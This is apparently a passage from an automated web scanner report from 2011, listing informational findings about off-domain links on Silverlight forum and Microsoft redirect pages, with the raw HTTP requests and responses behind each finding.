<a href="http://www.facebook.com/sharer.php?u=/eat-right/tips/stock-your-refrigerator-weight-loss?gt1=50002" id="fbicon"><img src="/sites/all/themes/fitlife/images/fb_icon.jpg" /></a>
<iframe src="http://www.facebook.com/plugins/like.php?href=http://fitbie.msn.com/eat-right/tips/stock-your-refrigerator-weight-loss?gt1=50002&layout=button_count&show_faces=false&action=like&colorscheme=light;" scrolling="no" frameborder="0" allowTransparency="true" style="border:none;overflow:hidden;height:25px;max-width:78px;">
</iframe>
...[SNIP]...
</span>
       <a href="http://www.menshealth.com/"> <img src="/sites/all/themes/fitlife/images/brandlogos/menshealth.png" alt="menshealth" />
...[SNIP]...
<p><a href="http://eatthis.menshealth.com/slideshow/6-rules-good-nutrition?cm_mmc=Fit_Life-_-Stock%20your%20refrigerator%20for%20weight%20loss-_-Slideshow-_-6%20Rules%20of%20good%20nutrition" target="_blank">Learn 6 rules of good nutrition</a>
...[SNIP]...
</em> <a href="https://shop.fitbie.com/the-lean-belly-prescription.html?keycode=149552">The Lean Belly Prescription</a>
...[SNIP]...
<li class="more-from-link">
<a href="http://www.menshealth.com/mhlists/cut_dietary_fat/index.php?cm_mmc=Fit_Life-_-Stock%20Your%20Regfrigerator%20For%20Weight%20Loss-_-Article-_-8%20Ways%20to%20Cut%20Fat%20Without%20Realizing%20It%20RL" target="_new" title="8 Painless Ways to Cut the Fat">8 Painless Ways to Cut the Fat</a>
...[SNIP]...
<li class="more-from-link">
<a href="http://www.menshealth.com/mhlists/diet_strategies/index.php?cm_mmc=Fit_Life-_-Stock%20Your%20Refrigerator%20For%20Weight%20Loss-_-Article-_-Outwit%20The%20Leading%20Weight%20Loss%20Traps%20For%20Guys%20RL" target="_new" title="6 Worst Weight Loss Traps for Guys">6 Worst Weight Loss Traps for Guys</a>
...[SNIP]...
<li class="more-from-link">
<a href="http://www.menshealth.com/mhlists/healthier_foods/index.php?cm_mmc=Fit_Life-_-Stock%20Your%20Refrigerator%20For%20Weight%20Loss-_-Article-_-10%20Painless%20Way%20To%20Upgrade%20Your%20Diet%20RL" target="_new" title="10 Painless Ways To Upgrade Your Diet">10 Painless Ways To Upgrade Your Diet</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/home?status=http://fitbie.redacted/eat-right/tips/stock-your-refrigerator-weight-loss?gt1=50002">Twitter</a></li>
<li class="facebook"><a href="http://www.facebook.com/sharer.php?u=http://fitbie.redacted/eat-right/tips/stock-your-refrigerator-weight-loss?gt1=50002">Facebook</a>
...[SNIP]...
<li class="digg"><a href="http://digg.com/submit?url=http://fitbie.redacted/eat-right/tips/stock-your-refrigerator-weight-loss?gt1=50002">Digg</a></li>
<li class="share">
       <a class="da2a_button" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Ffitbie.msn.com%2Feat-right%2Ftips%2Fstock-your-refrigerator-weight-loss&linkname=Stock%20Your%20Refrigerator%20for%20Weight%20Loss%20%7C%20Fitbie" id="da2a_1"> Share</a>
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<td>   <a target="_blank" href="http://www.facebook.com/home.php?#!/pages/Fitbie/120036858057635"><img src="/sites/all/themes/fitlife/images/facebook-f-icon.png" />
...[SNIP]...
<td>    <a target="_blank" href="http://twitter.com/Fitbie"><img src="/sites/all/themes/fitlife/images/twitter-t-icon.png" />
...[SNIP]...
<div class="feature-block"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=tnWATeFb&resize=false" target="_blank"><img src="http://images.rodale.com/fitlife/modules/happy-healthy-woman-laughing-th.jpg" alt="Tell Us What You Think About Fitbie!" border="0"/></a><h5>Survey</h5><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=tnWATeFb&resize=false" target="_blank"><h6>
...[SNIP]...
<li><a title="Manage Email Preferences" href="http://preferences.rodale.com/">Manage Email Preferences</a>
...[SNIP]...
<div class="social-media-links clear-block">
<a href="http://www.facebook.com/home.php?#!/pages/Fitbie/120036858057635" title="facebook" class="fb"></a>
<a href="http://twitter.com/Fitbie" title="twitter" class="tweet"></a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.82. http://forums.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://forums.silverlight.net/adchain.html?ZoneID=45&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.asp.net/a.aspx?Task=Click&ZoneID=45&CampaignID=1857&AdvertiserID=9&BannerID=2627&SiteID=2&RandomNumber=626665759&Keywords=
http://ads.asp.net/ads/WebUI_300x250_Silverlight.net_Forums.jpg

Request

GET /adchain.html?ZoneID=45&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; CommunityServer-LastVisitUpdated-2101=; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:22 GMT
Content-Length: 373

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=45&CampaignID=1857&AdvertiserID=9&BannerID=2627&SiteID=2&RandomNumber=626665759&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/WebUI_300x250_Silverlight.net_Forums.jpg" width="300" height="250" alt="" align="Center" border="0"></a>
...[SNIP]...

22.83. http://forums.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://forums.silverlight.net/adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.asp.net/a.aspx?Task=Click&ZoneID=389&CampaignID=1855&AdvertiserID=129&BannerID=2492&SiteID=2&RandomNumber=253691245&Keywords=
http://ads.asp.net/ads/W_DevSum11-bann_728x90.gif

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/user/viewonline.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:12:38 GMT
If-None-Match: ""

Response

22.84. http://forums.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://forums.silverlight.net/adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2

The response contains the following link to another domain:

http://d2.zedo.com/jsc/d2/fo.js

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; CommunityServer-LastVisitUpdated-2101=; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:22 GMT
Content-Length: 531

<html><head></head><body><body bgcolor="#FFFFFF">
<script language="JavaScript">
var zflag_ni
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...

22.85. http://forums.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://forums.silverlight.net/adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.asp.net/a.aspx?Task=Click&ZoneID=401&CampaignID=1855&AdvertiserID=129&BannerID=2492&SiteID=2&RandomNumber=1812121156&Keywords=
http://ads.asp.net/ads/W_DevSum11-bann_728x90.gif

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/user/viewonline.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:12:38 GMT
If-None-Match: ""

Response

22.86. http://forums.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://forums.silverlight.net/adchain.html?ZoneID=416&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.asp.net/a.aspx?Task=Click&ZoneID=416&CampaignID=1904&AdvertiserID=200&BannerID=2540&SiteID=2&RandomNumber=253691245&Keywords=
http://ads.asp.net/ads/myappis_banner_300x250rev2.gif

Request

GET /adchain.html?ZoneID=416&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/user/viewonline.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:12:38 GMT

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=cmxfsxg2vyina4ashnvp00ci; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 17:57:35 GMT
Content-Length: 408

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=416&CampaignID=1904&AdvertiserID=200&BannerID=2540&SiteID=2&RandomNumber=253691245&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/myappis_banner_300x250rev2.gif" width="300" height="250" alt="Advertisement - My App Is On Windows Phone" align="Center" border="0"></a>
...[SNIP]...

22.87. http://forums.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://forums.silverlight.net/adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=519&AdvertiserID=51&BannerID=471&SiteID=6&RandomNumber=1060255360&Keywords=
http://ads.neudesicmediagroup.com/ads/ClientUI%20ad1%20(728x90).jpg

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:39 GMT
Content-Length: 391

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=519&AdvertiserID=51&BannerID=471&SiteID=6&RandomNumber=1060255360&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/ClientUI%20ad1%20(728x90).jpg" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.88. http://forums.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://forums.silverlight.net/adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=464&AdvertiserID=11&BannerID=403&SiteID=6&RandomNumber=1318074501&Keywords=
http://ads.neudesicmediagroup.com/ads/Charting-728x90.png

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; CommunityServer-LastVisitUpdated-2101=; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:22 GMT
Content-Length: 381

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=464&AdvertiserID=11&BannerID=403&SiteID=6&RandomNumber=1318074501&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/Charting-728x90.png" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.89. http://forums.silverlight.net/forums/TopicsNotAnswered.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/TopicsNotAnswered.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://forums.silverlight.net/forums/TopicsNotAnswered.aspx?ForumID=-1

The response contains the following links to other domains:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js
http://channel9.msdn.com/
http://edge.technet.com/
http://msdn.microsoft.com/
http://msstonojsslvnet.112.2o7.net/b/ss/msstonojsslvnet/1/H.20.2--NS/0
http://visitmix.com/
http://www.asp.net/
http://www.iis.net/
http://www.msdn.com/
http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight
http://www.omniture.com/
http://www.windowsclient.net/

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73694
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:39 GMT; expires=Sun, 29-Jan-2012 23:20:39 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:40 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:20:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Thread
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
</p>
<a href="http://msdn.microsoft.com/"><img class="logo_msdn" alt="MSDN" src="http://i1.silverlight.net/resources/images/content/misc/header_logo_msdn.png?cdn_id=12152010">
...[SNIP]...
</iframe><a href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight"><img src="http://i1.silverlight.net/resources/images/content/misc/placeholder_advertisehere_top.png?cdn_id=12152010" alt="Advertise Here" />
...[SNIP]...
</iframe>
<a class="link_advertise" href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight">Advertise Here</a>
...[SNIP]...
</iframe><a href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight"><img src="http://i1.silverlight.net/resources/images/content/misc/placeholder_advertisehere.jpg?cdn_id=12152010" alt="Advertise Here" />
...[SNIP]...
</a> | <a href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight">Advertise with us</a>
...[SNIP]...
<div class="footer_img_links">
<a href="http://www.asp.net" title="ASP.net"><img src="http://i1.silverlight.net/resources/images/content/misc/aspnet.png?cdn_id=12152010" alt="ASP.net" />
...[SNIP]...
</a>
<a href="http://channel9.msdn.com" title="Channel 9"> <img src="http://i1.silverlight.net/resources/images/content/misc/channel9.png?cdn_id=12152010" alt="Channel 9" /></a>
<a href="http://edge.technet.com/" title="Edge Technet"> <img src="http://i1.silverlight.net/resources/images/content/misc/technet.png?cdn_id=12152010" alt="Edge Technet" /></a>
<a href="http://www.iis.net" title="IIS"><img src="http://i1.silverlight.net/resources/images/content/misc/iis.png?cdn_id=12152010" alt="IIS" /></a>
<a href="http://visitmix.com/" title="MIX"><img src="http://i2.silverlight.net/resources/images/content/misc/mix.png?cdn_id=12152010" alt="MIX" /></a>
<a href="http://www.msdn.com" title="MSDN"><img src="http://i3.silverlight.net/resources/images/content/misc/msdn.png?cdn_id=12152010" alt="MSDN" /></a>
<a href="http://www.windowsclient.net" title="Windows Client"> <img src="http://i3.silverlight.net/resources/images/content/misc/windows_client.png?cdn_id=12152010" alt="WindowsClient" />
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://msstonojsslvnet.112.2O7.net/b/ss/msstonojsslvnet/1/H.20.2--NS/0" height="1" width="1" border="0" alt="" /></a>
...[SNIP]...

22.90. http://forums.silverlight.net/forums/topicsactive.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/topicsactive.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://forums.silverlight.net/forums/topicsactive.aspx?forumid=-1

The response contains the following links to other domains:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js
http://channel9.msdn.com/
http://edge.technet.com/
http://msdn.microsoft.com/
http://msstonojsslvnet.112.2o7.net/b/ss/msstonojsslvnet/1/H.20.2--NS/0
http://visitmix.com/
http://www.asp.net/
http://www.iis.net/
http://www.msdn.com/
http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight
http://www.omniture.com/
http://www.windowsclient.net/

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73525
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:20 GMT; expires=Sun, 29-Jan-2012 23:17:20 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:21 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
The Of
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
</p>
<a href="http://msdn.microsoft.com/"><img class="logo_msdn" alt="MSDN" src="http://i1.silverlight.net/resources/images/content/misc/header_logo_msdn.png?cdn_id=12152010">
...[SNIP]...
</iframe><a href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight"><img src="http://i1.silverlight.net/resources/images/content/misc/placeholder_advertisehere_top.png?cdn_id=12152010" alt="Advertise Here" />
...[SNIP]...
</iframe>
<a class="link_advertise" href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight">Advertise Here</a>
...[SNIP]...
</iframe><a href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight"><img src="http://i1.silverlight.net/resources/images/content/misc/placeholder_advertisehere.jpg?cdn_id=12152010" alt="Advertise Here" />
...[SNIP]...
</a> | <a href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight">Advertise with us</a>
...[SNIP]...
<div class="footer_img_links">
<a href="http://www.asp.net" title="ASP.net"><img src="http://i1.silverlight.net/resources/images/content/misc/aspnet.png?cdn_id=12152010" alt="ASP.net" />
...[SNIP]...
</a>
<a href="http://channel9.msdn.com" title="Channel 9"> <img src="http://i1.silverlight.net/resources/images/content/misc/channel9.png?cdn_id=12152010" alt="Channel 9" /></a>
<a href="http://edge.technet.com/" title="Edge Technet"> <img src="http://i1.silverlight.net/resources/images/content/misc/technet.png?cdn_id=12152010" alt="Edge Technet" /></a>
<a href="http://www.iis.net" title="IIS"><img src="http://i1.silverlight.net/resources/images/content/misc/iis.png?cdn_id=12152010" alt="IIS" /></a>
<a href="http://visitmix.com/" title="MIX"><img src="http://i2.silverlight.net/resources/images/content/misc/mix.png?cdn_id=12152010" alt="MIX" /></a>
<a href="http://www.msdn.com" title="MSDN"><img src="http://i3.silverlight.net/resources/images/content/misc/msdn.png?cdn_id=12152010" alt="MSDN" /></a>
<a href="http://www.windowsclient.net" title="Windows Client"> <img src="http://i3.silverlight.net/resources/images/content/misc/windows_client.png?cdn_id=12152010" alt="WindowsClient" />
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://msstonojsslvnet.112.2O7.net/b/ss/msstonojsslvnet/1/H.20.2--NS/0" height="1" width="1" border="0" alt="" /></a>
...[SNIP]...

22.91. http://go.microsoft.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://go.microsoft.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://go.microsoft.com/?linkid=9759252

The response contains the following link to another domain:

http://live.visitmix.com/Registration

Request

GET /?linkid=9759252 HTTP/1.1
Host: go.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=NbkBuOI4W7cBv1mnAHhVbMOQZR4pSFpAnK7y46YYoMuoTqVfvpOJDTYUAUbtS2cNI8BvaR+SCC23nZMTeytyi7wNmiKQoC0huKoVOxO9PG4349NCx7DVlNmV/I4bkLVsQPDWI9Bsqfw4CAigE1dAh1BYCtKZo9uqxkgiGwXq+e0k2CWQBMJydEvQvf+a8Nmy0lBvBx9sMp029vD2knhH9q3cjQbZxn3d/T9SCIAmvvv/s2I5E7D3U2bYKmXA8D2pYaGjWhFIkGPPBwVNdZM0gBNghumGYE3ytU+ILnGMVeSvePI6D6PqDJrflWnDWzImxN5OE1evuVhNxF+HLtGrIkyVXonl+BTy57QP6nzOR8xDTgEwSjCHY8/Bk9JyRwZg7yIiU4jUEbrdJT2XMDr4AswK4Wiy1TGrclwPTNsTA9c0XB9nYdOMBy66L0gCAgZ5Xl2KxwR+ak8o2EGeRwJddAgw92owb1NRPjd/6vkOYqly9qWJu5Yj/8uUccCK8nxtzsHYjQ2KgbbGdKcZOJMx5arSS+8FsBl+/Opeqt5VTOk=&Microsoft.MicrosoftId=0237-9950-5424-5770; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; msdn=L=1033; omniID=1294458843112_6a73_9555_4be9_86ce555049db; ixpLightBrowser=0; WT_NVR_RU=0=technet:1=:2=; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3;

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 154
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:22:29 GMT
Location: http://live.visitmix.com/Registration
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:23:29 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://live.visitmix.com/Registration">here</a>.</h2>
</body></html>

22.92. http://go.microsoft.com/fwlink/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://go.microsoft.com
Path:	/fwlink/

Issue detail

The page was loaded from a URL containing a query string:

http://go.microsoft.com/fwlink/?LinkId=69157

The response contains the following link to another domain:

http://www.redacted/

Request

GET /fwlink/?LinkId=69157 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: go.microsoft.com
